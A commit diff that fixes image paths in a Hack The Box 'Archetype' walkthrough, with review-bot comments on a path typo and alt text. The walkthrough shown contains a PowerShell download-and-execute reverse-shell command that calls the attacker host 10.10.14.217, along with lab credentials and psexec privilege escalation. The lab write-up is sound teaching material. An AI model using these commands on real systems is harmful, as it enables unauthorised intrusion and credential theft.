Commit
1 parent 775ae0f · commit 21bd0d8
Showing 28 changed files with 26 additions and 20 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -4,39 +4,39 @@ I've been wanting to get into Hack The Box for a while now. The first machine I' | |
|
||
The first thing we are going to do is an initial Nmap scan with the tags : `-sC` (to tell Nmap to use it's default scripts), `-sV` (to get more information about the services running on the different ports of the machine) and using `-oN` we save the scan in a file. We get the following output: | ||
|
||
![Archetype/nmap_initial.png](Archetype/nmap_initial.png) | ||
![Archetype/nmap_initial.png](/images/Archetype/nmap_initial.png) | ||
|
||
Okay, so we can identify this box as a Windows machine and we find out that there is a Microsoft SQL Server running on port `1433` and there is a Samba on port `445`. | ||
|
||
We also run a more aggressive (`-A`) Nmap scan on all ports (`-p-`) to get more information. The output is as following: | ||
|
||
![Archetype/nmap_all_ports_aggressive.png](Archetype/nmap_all_ports_aggressive.png) | ||
![Archetype/nmap_all_ports_aggressive.png](/imges/Archetype/nmap_all_ports_aggressive.png) | ||
|
||
We don't get any interesting additional information here so let's move to on to enumerating Samba. | ||
|
||
The initial nmap scan tells us that we can access Samba using the `guest` account, so we will do just that using `smbmap`. We use `-u` to specify the user and `-H` to specify the host's IP. | ||
|
||
![Archetype\smbmap.png](Archetype/smbmap.png) | ||
![Archetype\smbmap.png](/images/Archetype/smbmap.png) | ||
|
||
We find out that backups and IPC$ are accessible as read only. So using smbclient we will access the both of them. First let's check out `backups`: | ||
|
||
![Archetype/smbclient_backups.png](Archetype/smbclient_backups.png) | ||
![Archetype/smbclient_backups.png](/images/Archetype/smbclient_backups.png) | ||
|
||
We find an interesting file here, `prod.dtsConfig`. We download it onto our machine using `get`. | ||
|
||
Now let's take a look at `IPC$`: | ||
|
||
![Archetype/smbclient_ipc.png](Archetype/smbclient_ipc.png) | ||
![Archetype/smbclient_ipc.png](/images/Archetype/smbclient_ipc.png) | ||
|
||
As you can see, we are unable to get any information from `IPC$` so let's take a look at `prod.dtsConfig`'s content. | ||
|
||
![Archetype/prod_dtsConfig.png](Archetype/prod_dtsConfig.png) | ||
![Archetype/prod_dtsConfig.png](/images/Archetype/prod_dtsConfig.png) | ||
|
||
We find creds here that look to be for the mssql server: `Archetype/sql_svc:M3g4c0rp123` (Note: the format here is `username:password`) | ||
|
||
Let's try getting in the MSSQL server using the creds we just found. We will be using an impacket script called `mssqlclient.py`. This script is already on kali linux but can be found [here](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py). The full command is: `python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -windows-auth ARCHETYPE/[email protected]`. | ||
|
||
![Archetype/mssql.png](Archetype/mssql.png) | ||
![Archetype/mssql.png](/images/Archetype/mssql.png) | ||
|
||
Great, it worked. The first thing we are going to run is `enable_xp_cmdshell` and we will prepare a powershell reverse shell on our machine that we are going to use to access the machine. | ||
|
||
|
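Review bot: the new target for the aggressive-scan screenshot is misspelled: `![Archetype/nmap_all_ports_aggressive.png](/imges/Archetype/nmap_all_ports_aggressive.png)` points at `/imges/` while every other image in this hunk moves to `/images/`, so that one image will render broken; change it to `/images/Archetype/nmap_all_ports_aggressive.png`. While here, the `smbmap` line keeps a backslash in its alt text (`![Archetype\smbmap.png]`), carried over unchanged from the old line and inconsistent with the forward slashes used in every other alt text.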
@@ -49,17 +49,17 @@ We are going to host the reverse shell file using the module `http.server` in py | |
|
||
Now we go back to mssql server and run `xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.217/shell.ps1\");"` to download and execute the reverse shell. | ||
|
||
![Archetype/call_revshell.png](Archetype/call_revshell.png) | ||
![Archetype/call_revshell.png](/images/Archetype/call_revshell.png) | ||
|
||
Wouhou we get a call back on our attacking machine and we have a reverse shell. Now let's enumerate the machine to find a way to escalate our privileges. | ||
|
||
On this machine, we are able to take a look at the command history of powershell and if we run: `type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` we get the administrator's password: `MEGACORP_4dm1n!!`. | ||
|
||
![Archetype/history_cmd.png](Archetype/history_cmd.png) | ||
![Archetype/history_cmd.png](/images/Archetype/history_cmd.png) | ||
|
||
Okay great now we just have to reconnect to the machine as administrator using another impacket script, `psexec.py`. We run `python3 /usr/share/doc/python3-impacket/examples/psexec.py [email protected]` and *voilà*! | ||
|
||
![Archetype/psexec.png](Archetype/psexec.png) | ||
![Archetype/psexec.png](/images/Archetype/psexec.png) | ||
|
||
Now we just need to get the flags! | ||
|
||
|
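Review bot: the alt text of every image in this hunk still repeats the old relative path (e.g. `![Archetype/call_revshell.png](/images/Archetype/call_revshell.png)`), so after the move to `/images/` the alt text describes a location that no longer matches the link target; since only the target changed here, consider replacing the alt text with a short description of each screenshot (the reverse-shell callback, the PSReadline history, the psexec session) so readers without images get something meaningful.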
File renamed without changes